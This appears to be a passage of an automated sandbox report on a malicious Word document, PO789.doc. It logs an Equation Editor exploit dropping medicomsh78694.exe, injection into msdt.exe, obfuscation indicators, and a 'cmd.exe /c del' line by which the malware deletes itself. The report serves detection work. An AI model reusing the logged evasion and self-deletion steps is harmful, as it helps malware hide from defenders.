Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBE0C6 5_2_00BBE0C6
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BED005 5_2_00BED005
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BD905A 5_2_00BD905A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC3040 5_2_00BC3040
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBE2E9 5_2_00BBE2E9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C61238 5_2_00C61238
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BE63DB 5_2_00BE63DB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBF3CF 5_2_00BBF3CF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C663BF 5_2_00C663BF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC2305 5_2_00BC2305
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C0A37B 5_2_00C0A37B
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC7353 5_2_00BC7353
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BD1489 5_2_00BD1489
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BF5485 5_2_00BF5485
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BFD47D 5_2_00BFD47D
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BDC5F0 5_2_00BDC5F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C06540 5_2_00C06540
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC351F 5_2_00BC351F
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC4680 5_2_00BC4680
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BCE6C1 5_2_00BCE6C1
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C62622 5_2_00C62622
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C0A634 5_2_00C0A634
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BCC7BC 5_2_00BCC7BC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C4579A 5_2_00C4579A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BF57C3 5_2_00BF57C3
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C5F8EE 5_2_00C5F8EE
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00AD79AE 5_2_00AD79AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A1238 7_2_026A1238
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FE2E9 7_2_025FE2E9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0264A37B 7_2_0264A37B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02607353 7_2_02607353
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02602305 7_2_02602305
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FF3CF 7_2_025FF3CF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026263DB 7_2_026263DB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A63BF 7_2_026A63BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02603040 7_2_02603040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261905A 7_2_0261905A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262D005 7_2_0262D005
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FE0C6 7_2_025FE0C6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A2622 7_2_026A2622
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0264A634 7_2_0264A634
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260E6C1 7_2_0260E6C1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02604680 7_2_02604680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026357C3 7_2_026357C3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260C7BC 7_2_0260C7BC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268579A 7_2_0268579A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0263D47D 7_2_0263D47D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268443E 7_2_0268443E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02635485 7_2_02635485
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02611489 7_2_02611489
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02646540 7_2_02646540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260351F 7_2_0260351F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261C5F0 7_2_0261C5F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026B3A83 7_2_026B3A83
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02627B00 7_2_02627B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FFBD7 7_2_025FFBD7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268DBDA 7_2_0268DBDA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026ACBA4 7_2_026ACBA4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262286D 7_2_0262286D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260C85C 7_2_0260C85C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269F8EE 7_2_0269F8EE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268394B 7_2_0268394B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02685955 7_2_02685955
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026169FE 7_2_026169FE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026029B2 7_2_026029B2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A098E 7_2_026A098E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261EE4C 7_2_0261EE4C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02632E2F 7_2_02632E2F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262DF7C 7_2_0262DF7C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02610F3F 7_2_02610F3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02672FDC 7_2_02672FDC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269CFB1 7_2_0269CFB1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260CD5B 7_2_0260CD5B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02630D3B 7_2_02630D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269FDDD 7_2_0269FDDD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0009D034 7_2_0009D034
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0009C0C5 7_2_0009C0C5
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 02643F92 appears 132 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0264373B appears 244 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0266F970 appears 84 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025FDF5C appears 119 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C2F970 appears 46 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00BBDF5C appears 65 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C0373B appears 109 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C03F92 appears 72 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004185EA NtCreateFile, 5_2_004185EA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00418642 NtCreateFile, 5_2_00418642
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041869A NtReadFile, 5_2_0041869A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041871A NtClose, 5_2_0041871A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004187CA NtAllocateVirtualMemory, 5_2_004187CA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk, 5_2_00BB00C4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk, 5_2_00BB0078
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00BB0048
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk, 5_2_00BB07AC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk, 5_2_00BAF9F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk, 5_2_00BAF900
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00BAFAE8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00BAFAD0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00BAFBB8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00BAFB68
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00BAFC90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00BAFC60
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00BAFD8C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00BAFDC0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00BAFEA0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00BAFED0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00BAFFB4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB10D0 NtOpenProcessToken, 5_2_00BB10D0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0060 NtQuerySection, 5_2_00BB0060
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB01D4 NtSetValueKey, 5_2_00BB01D4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB010C NtOpenDirectoryObject, 5_2_00BB010C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB1148 NtOpenThread, 5_2_00BB1148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk, 7_2_025F00C4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk, 7_2_025F07AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_025EFAD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_025EFAE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_025EFAB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk, 7_2_025EFB50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_025EFB68
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_025EFBB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF900 NtReadFile,LdrInitializeThunk, 7_2_025EF900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF9F0 NtClose,LdrInitializeThunk, 7_2_025EF9F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_025EFED0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_025EFFB4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_025EFC60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_025EFDC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_025EFD8C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0048 NtProtectVirtualMemory, 7_2_025F0048
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0078 NtResumeThread, 7_2_025F0078
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0060 NtQuerySection, 7_2_025F0060
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F10D0 NtOpenProcessToken, 7_2_025F10D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1148 NtOpenThread, 7_2_025F1148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F010C NtOpenDirectoryObject, 7_2_025F010C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F01D4 NtSetValueKey, 7_2_025F01D4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFA50 NtEnumerateValueKey, 7_2_025EFA50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFA20 NtQueryInformationFile, 7_2_025EFA20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFBE8 NtQueryVirtualMemory, 7_2_025EFBE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF8CC NtWaitForSingleObject, 7_2_025EF8CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF938 NtWriteFile, 7_2_025EF938
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1930 NtSetContextThread, 7_2_025F1930
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFE24 NtWriteVirtualMemory, 7_2_025EFE24
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFEA0 NtReadVirtualMemory, 7_2_025EFEA0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFF34 NtQueueApcThread, 7_2_025EFF34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFFC NtCreateProcessEx, 7_2_025EFFFC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC48 NtSetInformationFile, 7_2_025EFC48
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0C40 NtGetContextThread, 7_2_025F0C40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC30 NtOpenProcess, 7_2_025EFC30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC90 NtUnmapViewOfSection, 7_2_025EFC90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFD5C NtEnumerateKey, 7_2_025EFD5C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1D80 NtSuspendThread, 7_2_025F1D80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000985F0 NtCreateFile, 7_2_000985F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000986A0 NtReadFile, 7_2_000986A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_00098720 NtClose, 7_2_00098720
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000987D0 NtAllocateVirtualMemory, 7_2_000987D0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE indicator has summary info: false
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: PO789.doc Virustotal: Detection: 57%
Source: PO789.doc ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$PO789.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/9@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: medicomzx[1].exe.2.dr, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: medicomsh78694.exe.2.dr, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037AAA8 push eax; retn 0036h 4_2_0037AAA9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037EB30 push ebx; ret 4_2_0037EB31
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037ABC8 push esp; ret 4_2_0037ABC9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037B558 push eax; retf 0036h 4_2_0037B559
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C940 push dword ptr [D38E3050h]; ret 5_2_0041C961
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00409BCE push edx; retf 5_2_00409BCF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00413FD9 push edx; ret 5_2_00413FDB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0040B7F3 push ebp; iretd 5_2_0040B7F9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FDFA1 push ecx; ret 7_2_025FDFB4
Source: initial sample Static PE information: section name: .text entropy: 7.16750619992
Source: initial sample Static PE information: section name: .text entropy: 7.16750619992

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
